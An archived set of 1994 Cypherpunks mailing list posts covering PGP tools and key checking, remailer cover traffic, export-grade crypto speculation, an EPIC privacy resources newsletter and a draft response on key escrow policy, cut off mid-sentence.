1994 From: harveyrj at vt.edu (R. J. Harvey) Date: Fri, 16 Dec 94 09:21:43 PST Subject: something NOT MIME-related Message-ID: <9412161721.AA08486@toad.com> Hello: Not to distract from the entertaining MIME thread, but I've got a question that's a little closer to a crypto topic (i.e., software psueudo-random number generators). In the aftermath of the Pentium-can't-divide-accurately flap, I modified a random-number generation routine I'd written to check for the presence of the Pentium divide errors. In the process, I put in a routine that did an elementary benchmarking of the chip's performance in both integer (speed to repeatedly execute an empty for-loop 1 million times) and floating point operations (inserting a divide operation in the loop, and adjusting the resulting execution time by subtracting the time required for the empty loop before computing divide-calculations-per-second performance). This is an admittedly very crude benchmark, but I wanted to get some rough idea how many divides could be performed per minute of program execution (i.e., to estimate how long the program could run before a Pentium-problem might occur). Anyway, I found what appeared to be very strange results when comparing performance on my 486/66 versus a 486/25 and 386/20: namely, although the 386 was dead last on both the primarily integer-based empty- for-loop and for-loop-with-divide timings, the 486/25 and 486/66 turned in effectively identical times in the empty-loop benchmark (the 486/66 was about 33% faster than the 486/25 in the divide-based benchmark). All machines were running essentially equivalent versions of Windows for Workgroups). My question is, why would the 486/66 and 25 produce comparable integer- based empty loop performance? I haven't tried a comparable program running under plain-DOS to see if this is somehow Windows related. I supsect there's an easy explanation, but it escapes me. Any suggestions would be greatly appreciated. rj ------------------------------------------------------------------ R. J. Harvey (mail: harveyrj at vt.edu) (PGPkey 0BADDDB5: 82 42 53 EA 97 B0 A2 B2 FC 92 90 BB C2 26 FD 21) From danisch at ira.uka.de Fri Dec 16 09:37:17 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Fri, 16 Dec 94 09:37:17 PST Subject: PGP key checking Message-ID: <9412161735.AA06993@elysion.iaks.ira.uka.de> I just signed and checked some pgp keys (using pgp 2.6.1) and I found something unexpected: Keys can be checked with the -kc option. To identify the key to be checked either a string or the KeyID (with 0x-prefix) can be given as an argument. If I do now pgp -kc name_of_anyone pgp -kc 0xanyones_key_id for the very same key (once identified by substring, once by keyid, which should both do the same job) the first command checks many more signatures than the second command. The second command stops earlier, but I couldn't find out yet, whether this stops after finding a trusted path to the checked key or what else could be the reason for this. Any ideas? Hadmut From hfinney at shell.portal.com Fri Dec 16 09:54:24 1994 From: hfinney at shell.portal.com (Hal) Date: Fri, 16 Dec 94 09:54:24 PST Subject: Question for remailer operators In-Reply-To: Message-ID: <199412161753.JAA21458@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- lcottrell at popmail.ucsd.edu (Lance Cottrell) writes, quoting Hal: >>I see about 200 messages a day through my remailer, sizes averaging a >>couple of K. I had the impression at one point that the VAST majority of >>this was "cover" traffic that someone is generating just to keep the >>network busy. I don't know if this is still the case. It might be >>possible to opt out of the cover traffic generator to reduce your load >>to a politically manageable level. Maybe people generating cover traffic >>could estimate how many messages they are generating. >I have a script generating covering traffic. It creates a message at random >intervals between 1 and 20 min. The messages are encrypted, and padded with >cutmarks for all remailers which support that. The messages are sent >through six hops. The remailers are chosen from all reasonably reliable >remailers on Raph Levine's list (except for those which have asked to be >excluded). So, if the average interval is 10 minutes, that would be 6 messages per hour or 6*24 = 144 messages a day. Each message goes through 6 of probably a dozen or so remailers or about half of them, so that would be about 70 messages per remailer per day from your script. My count above is of messages through both the alumni and portal remailers, so that would be about 140 from you out of around 200 or about 70% from your script. If you have more or less than a dozen remailers to choose from that would affect this figure. I really think this script is overkill at the current time. Each message has to be decrypted and dispatched, and this makes the remailer pretty conspicuous. I think the script could slow the acceptance of remailers. In any case, I think I will ask you to take the alumni.caltech and shell.portal remailers off of your list. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvHTsBnMLJtOy9MBAQGinQH+Nlf23RsSpQ1SZozusuxo27Hb8lPIRAjI NXRDS0sX2OcHdu0v5clbVsG8SVypA111+/FskTLGc7BsBaFwXAWRpQ== =iD1C -----END PGP SIGNATURE----- From mark at unicorn.com Fri Dec 16 10:00:37 1994 From: mark at unicorn.com (Mark Grant) Date: Fri, 16 Dec 94 10:00:37 PST Subject: Privtool 0.83 Released Message-ID: Sorry to bring the list back to cryptography, but there's now a new version of Privtool (PGP-aware mailer for Xview) on ftp.c2.org in /pub/privtool/privtool-0.83.tar.Z. This version has two major fixes which greatly improve performance and reduce memory usage, along with a number of minor fixes. In the next few days I'll upload it to ftp.dsi.unimi.it and update the on-line documentation on my WWW site. Mark P.S. No, it doesn't support MIME. From m5 at vail.tivoli.com Fri Dec 16 10:04:16 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Fri, 16 Dec 94 10:04:16 PST Subject: Kaufman/Eastlake DNS changes In-Reply-To: <9412161608.AA03398@sulphur.osf.org> Message-ID: <9412161804.AA07410@vail.tivoli.com> Rich Salz writes: > As a side note, it's too bad that Digital seems to have lost all of > their crypto-folks. Those folks, I suppose, were all hired *after* the decision was made to encode RSTS passwords with simple radix-50... | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From warlord at MIT.EDU Fri Dec 16 10:25:54 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 16 Dec 94 10:25:54 PST Subject: [Cynthia Clark: RE: I-D ACTION:draft-pgp-pgpformat-00.txt] Message-ID: <9412161825.AA12898@toxicwaste.media.mit.edu> I think that most cypherpunks would be interested in this. I realize that many of you are on the IETF announcement list and probably have already seen this, but I thought that I'd forward it for those of you who aren't on it... -derek ------- Forwarded Message A New Internet-Draft is available from the on-line Internet-Drafts directories. Title : PGP Message Exchange Formats Author(s) : D. Atkins, W. Stallings, P. Zimmermann Filename : draft-pgp-pgpformat-00.txt Pages : 21 Date : 12/13/1994 PGP (Pretty Good Privacy) uses a combination of public-key and conventional encryption to provide security services for electronic mail messages and data files. These services include confidentiality and digital signature. PGP is widely used throughout the global computer community. This document describes the format of "PGP files", i.e., messages that have been encrypted and/or signed with PGP. PGP was created by Philip Zimmermann and first released, in Version 1.0, in 1991. Subsequent versions have been designed and implemented by an all-volunteer collaborative effort under the design guidance of Philip Zimmermann. PGP and Pretty Good Privacy are trademarks of Philip Zimmermann. Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-pgp-pgpformat-00.txt". A URL for the Internet-Draft is: ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt Internet-Drafts directories are located at: o Africa Address: ftp.is.co.za (196.4.160.2) o Europe Address: nic.nordu.net (192.36.148.17) o Pacific Rim Address: munnari.oz.au (128.250.1.21) o US East Coast Address: ds.internic.net (198.49.45.10) o US West Coast Address: ftp.isi.edu (128.9.0.32) Internet-Drafts are also available by mail. Send a message to: mailserv at ds.internic.net. In the body type: "FILE /internet-drafts/draft-pgp-pgpformat-00.txt". NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. For questions, please mail to Internet-Drafts at cnri.reston.va.us. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. - --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" - --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv at ds.internic.net" Content-Type: text/plain Content-ID: <19941213160355.I-D at CNRI.Reston.VA.US> ENCODING mime FILE /internet-drafts/draft-pgp-pgpformat-00.txt - --OtherAccess Content-Type: Message/External-body; name="draft-pgp-pgpformat-00.txt"; site="ds.internic.net"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <19941213160355.I-D at CNRI.Reston.VA.US> - --OtherAccess-- - --NextPart-- ------- End of Forwarded Message From eric at remailer.net Fri Dec 16 10:35:47 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 16 Dec 94 10:35:47 PST Subject: Thoughts on 15 day CJ crypto Message-ID: <199412161933.LAA09366@largo.remailer.net> As most of you know, the SPA/NSA deal for auto-approved export requires 512 bit RSA and 40 bit RC4. Everyone knows that 40 bit RC4 is weak cryptographically, but no one particularly thought that 512 bits RSA was -- weakening, maybe, but not down in the real-time crack range. I had an insight yesterday as to that particular requirement. Consider the standard kind of way that one uses a hybrid crypto system. The secret session key is encrypted with the public key. There are now two ciphers that can be broken. And you only need to break one of them. So the NSA breaks 40-bit RC4 by brute force. The keyspace is small. What is left unsaid about the search is that candidate decryption keys need to be selected. You can't do a ciphertext only attack if the plaintext is random bits. The 512 bit RSA can be used to verify candidate keys. Doing 2^40 modexp's is probably not how it's done (but it might be), but if you can eliminate the bulk of candidate RC4 keys in some other way (by looking at trial decryptions) then you've got a way of verifying the rest of them. If trial decryption can eliminate, say, one of every hundred or thousand keys then the RSA verification could be done in real time. So it's possible the RSA requirement is in there to provide an assurance that the right key was selected. Eric From amanda at intercon.com Fri Dec 16 11:52:57 1994 From: amanda at intercon.com (Amanda Walker) Date: Fri, 16 Dec 94 11:52:57 PST Subject: Thoughts on 15 day CJ crypto Message-ID: <9412161454.AA07036@chaos.intercon.com> > So it's possible the RSA requirement is in there to provide an > assurance that the right key was selected. I would be fairly surprised if this weren't the case, since it allows trial decryption to be done completely without human intervention. This would speed up the cycle time (and reduce the resources needed) for decrypting intercepts, with more reliability than a straight statistical check on the candidate plaintext. Amanda Walker InterCon Systems Corporation From banisar at washofc.epic.org Fri Dec 16 12:22:30 1994 From: banisar at washofc.epic.org (Dave Banisar) Date: Fri, 16 Dec 94 12:22:30 PST Subject: EPIC Alert 1.08 Message-ID: <00541.2870433981.1521@washofc.epic.org> Date 12/16/94 Subject EPIC Alert 1.08 From Dave Banisar To info ============================================================= @@@@ @@@@ @@@ @@@@ @ @ @@@@ @@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@@ @ @@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @@@ @@@@ @ @ @@@@ @@@@ @ @ @ ============================================================ Volume 1.08 December 16, 1994 ------------------------------------------------------------ Published by the Electronic Privacy Information Center (EPIC) Washington, DC ======================================================================= Table of Contents: Special Issue: Privacy Resources ======================================================================= [1] Privacy Organizations [2] Publications [3] Net Sites for Privacy [4] Privacy Mailing Lists and Newsgroups [5] Donations for EPIC [6] Upcoming Conferences and Events A regularly updated version of this issue will be available at http://epic.digicash.com/epic and at cpsr.org /cpsr/privacy/epic/privacy_resources.faq. This issue is also available in html format from http://epic.digicash.com /epic Send additions, suggestions to alert at epic.org. ======================================================================= [1] Privacy Organizations ======================================================================= Electronic Privacy Information Center. EPIC was established in 1994 to focus public attention on emerging privacy issues relating to the National Information Infrastructure, such as the Clipper Chip, the Digital Telephony proposal, medical records privacy and the sale of consumer data. EPIC conducts litigation, sponsors conferences, produces reports, publishes the EPIC Alert and leads campaigns on privacy issues. For more info, email: info at epic.org, or HTTP://epic.digicash.com /epic. EPIC, 666 Penn. Ave, SE, Suite 301, Washington, DC 20003. (202) 544-9240 (tel). Director: Marc Rotenberg. Privacy International. An international human rights group based in London, England with offices in Washington, DC and Sydney, Australia. PI has members in over 40 countries and has led campaigns against privacy violations in numerous countries including Australia, New Zealand, and the Philippines. PI publishes the International Privacy Bulletin and sponsors international conferences on privacy issues. Email pi at epic.org. Privacy International c/o EPIC, 666 Penn. Ave, SE, Suite 301, Washington, DC 20003. Director General: Simon Davies. US Privacy Council. A coalition of US privacy groups and individuals founded in 1991 to deal with privacy issues in the US. USPC works in Washington monitoring legislation and the activities of government agencies. USPC works closely with other groups on privacy issues including National ID cards, reforming credit reporting, Caller ID and international issues. Email: privtime at access.digex.net. P.O. Box 15060, Washington, DC 20003. (202) 829-3660 (tel). Chair: Evan Hendricks. Privacy Rights Clearinghouse. A California-based organization formed in 1992. The Clearinghouse has produced many fact sheets and an annual report, and maintains a toll free hotline to provide advice to consumers about their rights. Email: prc at teetot.acusd.edu. 5998 Alcala Park, San Diego, CA 92110. (619) 260-4806 (tel). 800-773-7748 (in Cal. only). Director: Beth Givens. Computer Professionals for Social Responsibility. A national membership organization of people concerned about the impact of technology on society. CPSR sponsors an annual conference, maintains numerous mailing lists on computer-related issues, a large internet site of information and publishes a quarterly newsletter. It has 24 local chapters across the US and several international affiliates. CPSR sponsors working groups on civil liberties, working in the computer industry and others. Contact: cpsr-info at cpsr.org. PO Box 717, Palo Alto, CA 94301. (415) 322-3778 (tel). Managing Director: Kathleen Kells. Internet Society. Group dedicated to fostering evolution of the Internet and its use. Sponsors yearly conference, publishes excellent quarterly newsletter, works with standards committees to develop Internet standards for networking and privacy. Email: isoc at isoc.org. http://info.isoc.org/ 12020 Sunrise Valley Drive, Suite 270, Reston, VA 22091. (703) 648-9888 (tel). Executive Director: Anthony Rutkowski. Electronic Frontier Foundation. Formed in 1990. Maintains an Internet site, publishes an electronic newsletter, and lobbies in Washington. Email: info at eff.org. 1667 K St. NW, Suite 801, Washington, DC 20006-1605 USA 202-347-5400 (tel). Director: Andrew Taubman. American Civil Liberties Union. National civil liberties organization. Originally founded in 1920, the ACLU conducts extensive litigation on Constitutional issues including privacy, and free speech. The ACLU Washington office lobbies Congress for civil liberties and civil rights issues. Email: infoaclu at aclu.org. 322 Eighth Ave, New York, NY 10001. Executive Director: Ira Glasser. Cypherpunks. Informal group that develops technological solutions to protect privacy. the Cypherpunks write cryptography and other programs, set up anonymous remailers and discuss political and technical issues. Meetings are also regularly held in California and other states. ftp/gopher soda.berkeley.edu Voters Telecom Watch. NY based cyber-rights lobbying group. In 1994 lobbied against the FBI Wiretap bill and for relaxation of export controls on cryptography. Affiliated with Society for Electronic Access. Contact: shabbir at panix.com Society for Electronic Access. NY-based electronic civil liberties organization promotes "civil liberties and access in cyberspace". Email: sea at sea.org or http://www.panix.com/sea. P.O. Box 7081, New York, NY 10116-7081. (212) 592-3801. President: Simona Nass. EFF Austin. Austin, TX-based, electronic civil liberties organization founded in 1990. Purpose is to engage in and support educational activities that promote a clearer understanding of the social, legal, and technical issues surrounding online telecommunications. Contact: eff-austin at zilker.net or (gopher/ftp).zilker.net. Also see newsgroup austin.eff. PO Box 18957, Austin, TX 78760. President: David Smith. ======================================================================= [2] Publications ======================================================================= Privacy Times. Biweekly newsletter on information law. Each issue covers developments related to privacy and information access, including summaries of court decisions on the Freedom of Information Act and other relevant statutes. Editor: Evan Hendricks. Address: P.O. Box 21501, Washington, DC 21501. (202) 829-3660. Cost: $250/Year Privacy Journal. A monthly journal on mainly US privacy, now in its 20th year of publication. Editor: Robert Ellis Smith. P.O. Box 28577, Providence, RI 02908. (401) 274-7861 (tel). Cost: $109/year. The PJ also publishes numerous books and compendiums on privacy including its excellent yearly Compilation of State and Federal Laws. International Privacy Bulletin. Published quarterly by Privacy International. The IPB covers international trends and new technologies. Each issue also includes reports from different countries and reviews of new publications. Editor: Dave Banisar. 666 Penn. Ave, SE #301, Washington, DC 20003. (202) 544-9240 (tel). Cost: $50/year individuals, $200/year organizations. Privacy and American Business. Published bi-monthly. A new publication provides the industry perspective on privacy. Editor: Bob Belair. Bimonthly with special issues. Two University Plaza, Suite 414, Hackensack, NJ 07601. (201) 996-1154 (tel). Cost: $395/year. Full Disclosure. A monthly newspaper on surveillance and civil liberties issues. Editor: Glen Roberts. Box 734, Antioch, IL 60002. (708) 395-6200. Cost: $29.95/year. Low Profile. Asset protection and financial privacy. Published monthly. Editor: Mark Nestman. P.O. Box 84910, Phoenix, AZ 85701. 702-333-5942 (tel). Cost: $149/year. Privacy and Security 2001. Technical aspects of privacy and security. Focuses on electronic surveillance and counter-measures with recent assaults on privacy highlighted. Editor Jim Ross. 504 Shaw Road, Suite 222, Sterling, VA 20166. (703) 318-8600. 10/year. $35/year. 2600 Magazine. Inside technical information on telephone and computer network operations. Published quarterly. Editor: Emmanual Goldstein. Email 2600 at well.sf.ca.us. P.O. Box 752, Middle Island, NY 11953. Cost:$21/year. Privacy Law and Policy Reporter. A well written, law-oriented overview of privacy developments in NZ and Australia. 10 issues/year. Level 11, Carlton Centre, 55-63 Elizabeth Street, Sydney, NSW 2000, Australia. 61-2-221-6199 (tel). Cost: $AZ 345 Transnational Data and Communications Report. Bimonthly international overview of privacy, data protection, telecommunications and information access. Editor: Russell Pipe. P.O. Box 10528, Burke VA 22009-0528. Cost: $280/year. Privacy Laws and Business. A quarterly comprehensive overview of privacy issues in Europe. Focuses mainly on regulatory and data protection from a business perspective. Editor: Stewart Dresner. Cost: 3 Central Avenue, Pinner, Middlesex HA5 5BT United Kindgom. 44-81-866-8641(tel). $UK 240/year. ======================================================================= [3] Net Sites ======================================================================= ACLU On-line Reading Room. Files on civil liberties. ftp/gopher aclu.org CPSR Internet Library. Maintains the online archives for CPSR, EPIC Privacy International and others. FTP/Gopher/WAIS/HTTP cpsr.org /cpsr Cypherpunks. Archives on cryptography and other privacy technologies. ftp/gopher soda.berkeley.edu Electronic Frontier Foundation Archives. Archives on privacy, free speech, underground newsletters. http://WWW.eff.org, FTP: ftp.eff.org Electronic Privacy Information Center. Includes back issues of EPIC Alert, privacy resources, legislation, and articles. http://www.epic.digicash.com/ Privacy Rights Clearinghouse. http://www.manymedia.com/prc/ E-mail: prc at teetot.acusd.edu. Gopher: gopher.acusd.edu FTP:ftp.acusd.edu. Telnet: teetot.acusd.edu (local> c teetot, login: privacy). BBS: 619-260-4670 (same login as telnet). ======================================================================= [4] Electronic Newsgroups and Mailing Lists ======================================================================= Unmoderated Newsgroups and mailing lists: Alt.privacy. Unmoderated discussion on privacy. High traffic, low content. Alt.privacy clipper. Unmoderated discussion of the Clipper chip and encryption policy. Comp.org.cpsr.talk. Unmoderated discussion of issues related to the Computer Professionals for Social Responsibility. Topics include privacy, the NII, telecommunications reform and social implications of technology. Comp.org.eff.talk. Unmoderated discussion of issues related to the Electronic Frontier Foundation. Cypherpunks Mailing list. Discussion of cryptography and technical protections of privacy. Warning: High Traffic (100+ messages/day). Sci.crypt. Unmoderated technical discussion of encryption. talk.politics.crypto. Unmoderated discussion of the Clipper chip and encryption policy. Moderated Newsletters and Digests: EPIC Alert. Biweekly electronic newsletter of the Electronic Privacy Information Center. Mail to listserv at cpsr.org. 1st line: subscribe cpsr-announce. Back issues at cpsr.org /cpsr/alert and http://www.epic.digicash.com/ CPSR-Global. A new CPSR sponsored mailing list on Global information infrastructure issues. Moderator: Marsha Woodbury. To subscribe, email listserv at cpsr.org with the 1st line: subscribe cpsr-global Risks Digest. Moderated digest on risks to the public using computers and related systems. Newsgroup: comp.risk. Also available as mailing list from email: risks-request at csl.sri.com 1st line: SUBSCRIBE. Back Issues at ftp unix.sri.com /risks. Moderator: Peter Neumann. Computer Privacy Digest. Moderated digest on privacy. Newsgroup: comp.society.privacy. at wam.uwm.edu. Moderator: Len Levine. To Subscribe, email: comp-privacy-request at uwm.edu, 1st line "subscribe" Back issues gopher: gopher.cs.uwm.edu, ftp: ftp.cs.uwm.edu/comp-priv. Computer Underground Digest. Weekly moderated digest on computer underground, privacy, free speech issues. Newsgroup: comp.society.cu-digest. Email at LISTSERV at VMD.CSO.UIUC.EDU, 1st line: SUB CUDIGEST . Back issues at etext.archive.umich.edu /pub/CuD/. Moderator: Jim Thomas. Computer Privacy Forum. Moderated digest on privacy sponsored by ACM. To subscribe, send message: help to privacy-request at vortex.com. Back issues at ftp.vortex.com /privacy or http://www.vortex.com/. Moderator: Lauren Weinstein. Comp.org.cpsr.announce. Moderated mailing list for CPSR. Includes EPIC Alert, and other CPSR newsletters and releases. Also available as mailing list. See EPIC Alert for subscription info. VTW Announce. Moderated mailing list of Voters Telecomm Watch. Email listproc at panix.com, 1st line of the message: SUBSCRIBE VTW-ANNOUNCE . ======================================================================= [5] Contributions to EPIC ======================================================================= If you'd like to support the work of the Electronic Privacy Information Center, contributions are welcome and fully tax-deductible. Checks should be made out to "The Fund for Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington DC 20003. Your contributions will help support Freedom of Information Act litigation, strong and effective advocacy for the right of privacy and efforts to oppose Clipper and Digital Telephony wiretapping proposals. ======================================================================= [6] Upcoming Privacy Related Conferences and Events ======================================================================= 1995 Data Security Conference. Jan 9-11, 1995. Redwood City, CA. Sponsored by RSA Data Security. Contact: kurt at rsa.com. Second International Conference on Information Warfare: "Chaos on the Electronic Superhighway" Jan 18-19, Montreal, CA. January 18, 1995, Sponsored by NCSA. Contact: Mich Kabay (75300.3232 at compuserve.com). Privacy, The Information Infrastructure and Healthcare Reform, Ohio State University, Columbus, OH, Jan. 27. Contact: vberdaye at magnus.acs.ohio-state.edu. Towards an Electronic Patient Record '95. Orlando, FL. Mar. 14-19, 1995. Sponsored by Medical Records Institute. Contact: 617-964-3926 (fax). Access, Privacy, and Commercialism: When States Gather Personal Information, College of William and Mary, Williamsburg, VA, March 17. Contact: Trotter Hardy 804 221-3826. Computers, Freedom and Privacy '95. Palo Alto, Ca. Mar. 28-31, 1995. Sponsored by ACM. Contact: cfp95 at forsythe.stanford.edu. ETHICOMP95: An international conference on the ethical issues of using Information Technology, DeMontfort University, Leicester, ENGLAND, March 28-30, 1995. Contact: Simon Rogerson srog at dmu.ac.uk 44 533 577475 (phone) 44 533 541891 (Fax). 1995 IEEE Symposium on Security and Privacy, Oakland, CA, May 8-10. Contact: sp95 at itd.nrl.navy.mil. INET '95. Honolulu, HI. June 28-30, 1995. Sponsored by the Internet Society. Contact inet95 at isoc.org. Key Players in the Introduction of Information Technology: Their Social Responsibility and Professional Training. July 5-6-7, 1995. Namur, Belgium. Sponsored by CREIS. Contact: nolod at ccr.jussieu.fr. (Send calendar submissions to Alert at epic.org) ======================================================================= The EPIC Alert is a free biweekly publication of the Electronic Privacy Information Center. To subscribe, send the message: SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname to listserv at cpsr.org. You may also receive the Alert by reading the USENET newsgroup comp.org.cpsr.announce. Back issues are available via FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert and on Compuserve at Keyword: NCSA, Library 2 (EPIC/Ethics). A HTML version of the current issue is available from epic.digicash.com/epic ======================================================================= The Electronic Privacy Information Center is a public interest research center in Washington, DC. It was established in 1994 to focus public attention on emerging privacy issues relating to the National Information Infrastructure, such as the Clipper Chip, the Digital Telephony proposal, medical record privacy, and the sale of consumer data. EPIC is sponsored by the Fund for Constitutional Government and Computer Professionals for Social Responsibility. EPIC publishes the EPIC Alert and EPIC Reports, pursues Freedom of Information Act litigation, and conducts policy research on emerging privacy issues. For more information, email info at epic.org, WWW at HTTP://epic.digicash.com /epic or write EPIC, 666 Pennsylvania Ave., SE, Suite 301, Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax). The Fund for Constitutional Government is a non-profit organization established in 1974 to protect civil liberties and constitutional rights. Computer Professionals for Social Responsibility is a national membership organization of people concerned about the impact of technology on society. For information contact: cpsr-info at cpsr.org ------------------------ END EPIC Alert 1.08 ------------------------ _________________________________________________________________________ Subject: EPIC Alert 1.08 _________________________________________________________________________ David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais/HTTP Washington, DC 20003 * cpsr.org /cpsr/privacy/epic From anonymous-remailer at shell.portal.com Fri Dec 16 12:47:04 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 16 Dec 94 12:47:04 PST Subject: Digital privacy Message-ID: <199412162046.MAA11758@jobe.shell.portal.com> So I was netsurfing and came across CellularOne's home page. So I thought I'd do a little investigative work...this is the same company which advertises that your digital phone conversation is private even in a crowded restaurant! Here's what its WWW server had to say: >The Difference Digital Makes > >Cellular phones play an indispensable role in everyday life in the 1990s. But >>what exactly does digital technology bring to the table? > >Static meets its match. Since digital transmission only recognizes and >converts >variations in the human voice, static is virtually eliminated. >Voices come >through loud and clear. Background noise isn't just reduced, it's >virtually >eliminated. So is cross-talk. > >Capacity three times. Ultimately, digital technology will triple the size of >>the cellular phone information highway. So as we convert, more room will be >>freed up for more of your important calls. Resulting in more calls going >>through faster. On the first try. And fewer calls being dropped. > >Pssst, what about privacy? Again, since your voice is digitally processed, >it's >less likely that anyone could eavesdrop on your conversations. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ?Como? This is absolutely amazing! ======================Herodotus===================== Great deeds are usually wrought at great risks. ==================================================== _/_/_/ _/_/_/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/_/_/ _/ _/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/ From amanda at intercon.com Fri Dec 16 13:24:55 1994 From: amanda at intercon.com (Amanda Walker) Date: Fri, 16 Dec 94 13:24:55 PST Subject: Digital privacy Message-ID: <9412161623.AA23186@chaos.intercon.com> > >Pssst, what about privacy? Again, since your voice is digitally > >processed, it's >less likely that anyone could eavesdrop on > >your conversations. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > ?Como? This is absolutely amazing! Well, it is true, from a pragmatic point of view. A neighborhood kid with a Radio Shack scanner can't listen in on digital cellular calls. You have to actually hack a phone, which is a much less prevalent skill. I still think that CDMA+DES is the way to go for secure cellular, but from a purely pragmatic point of view simply going digital does increase privacy. Using analog cellular is like using a walkie-talkie. Amanda Walker InterCon Systems Corporation From adam at bwh.harvard.edu Fri Dec 16 13:38:30 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 16 Dec 94 13:38:30 PST Subject: NAS Crypto study Message-ID: <199412162138.QAA00607@bwnmr5.bwh.harvard.edu> Last week, the National Research Council posted a question to cypherpunks, asking for opinions. Here's mine (draft form) , I invite comments before I send it in. Adam NAS crypto question 1 ? How, if at all, do capabilities enabled by new and emerging ? technology in telecommunications (e.g., key-escrow ? encryption technologies, digital telephony) and electronic ? networking make it _easier_ for those who control that ? technology to compromise and/or protect the interests of ? individual end users? Please use as the standard of ? comparison the ease _today_ of compromising or ? protecting these interests. We are interested in ? scenarios in which these interests might be compromised ? or protected both individually and on a large scale. Please ? be sure to tell us the interests you believe are at stake. There are several areas in which the privacy of users is being changed by new technologies. The control of the new technologies is fundamental to privacy issues. When control is held by service providers, interests of the end users fall by the wayside. When that control is distributed, then the end users, naturally, have the ability to protect their own interests. Control of technology does not need to be held by service providers, the government, or any other centralized entity. It can be taken, today, by individuals who are concerned enough to do so. I will use as my basis for comparison the ease of compromising the interests of an individual who chooses to protect their communications with the tools available to them, mainly PGP and the remailer network. These tools are not yet trivially easy to use, but they are out there and they are being improved. Since those tools are available today to those who are interested, I will use them as a baseline against which centralized 'security' can be compared. The FBI wiretapping bill creates a new power for government - the right to tap phones. The change is a subtle one with large implications. It creates an additional array of points of failure for a possibly secure network. Law enforcement agents today have the ability, acquired yesterday through an accident of technology, to tap phones. That does not mean that ability should be preserved. It is widely known that this ability has been, and probably still is, abused.[1] (What do you call an illegal wiretap? An anonymous informant.) GAK (Government Access to Keys) codifies a similar accident; that networks are insecure becomes a design feature. [1] I'll be adding references to Bamford & Kahn. In such centrally controlled system, there will be points where the entire system can fail. Those points of failure could expose an entire population of users to information leaks. They may be well protected, but even the NSA has had agents defect. This model is in start contrast to the situation today, where individuals can take responsibility for their own encryption. If there is no centralized back door, no database of keys, LEA fields, and the like, then the security of each key must be breached where it is likely to be best protected, namely in the possession of its user. I would understand the value of my private keys to me, and not disclose them. Thus we have made it substantially easier to damage the interests of end users, while not adding anything to their protection. You could argue that the government has an excellent track record in protecting information. This is only partly true. The government did an excellent job of covering up radiation tests on the mentally ill; it has done a poor job of concealing Social Security numbers, which the IRS prints on the outside of tax documents, claiming the US mail is secure[2]. Only when there are institutional interests at stake does the government show any interest in protecting information about citizens. Doubtlessly, accidental or illegal revelation of keys would be carefully classified, along with the names of the effected individuals. [2] I'll be adding a reference to RISKS digests. The bureaucrat, not having a personal stake in the security of the keys, will be more lax than an individual. No one believes that agents of the government will look out for them as well as they look out for themselves. If they did, perhaps we'd all be happy to let the IRS compute our taxes. It would sure make life easier. But we don't. The individual is always the best protector of their own interests. To hammer on the point, there have been repeated cases of INS employees selling green cards, FBI agents who create rules of engagement later found unconstitutional, and agents of every three letter agency in Washington have sold out to the Russians. To quote an NSA historian who I spoke with about Aldrich Ames at the NSA museum, "Its amazing how cheaply someone will betray their country." If we mandate backdoors in a system, they will be found and exploited. Give end users control of the technology, including source code and access to algorithims, and they are empowered to choose a level of security that is appropriate. The government can not do so, and should not try. A few scenarios to illustrate better my points. ******************* Postulate the existence of a rich and powerful drug lord. He has millions of dollars to protect his large shipments. Lets call him Pablo. Pablo decides he needs to listen in on DEA conversations. Plot A: put in place a system of GAK (government access to keys.) Lets call it Clipper, for convenience. Lets also say that the DEA is using Clipper to protect its phone conversations about Pablo. Pablo finds a low level employee of some key escrow agency. Lets call him Aldrich. Aldrich likes fast cars. Pablo buys Aldrich a fast car, in exchange for 8 or 10 keys, easily smuggled out on a floppy disk. Aldrich has just broken the law, and will doubtless be providing keys to Pablo for a very long time. Pablo, meanwhile, is laughing at the DEA agents, to whose daily phone meeting he listens. Plot B: There is no GAK. The DEA uses PGP, (having gotten copies from European FTP sites so as to not export it to its agents in South America.) The DEA agents hunting Pablo are the only ones with their keys. They know what Pablo does to 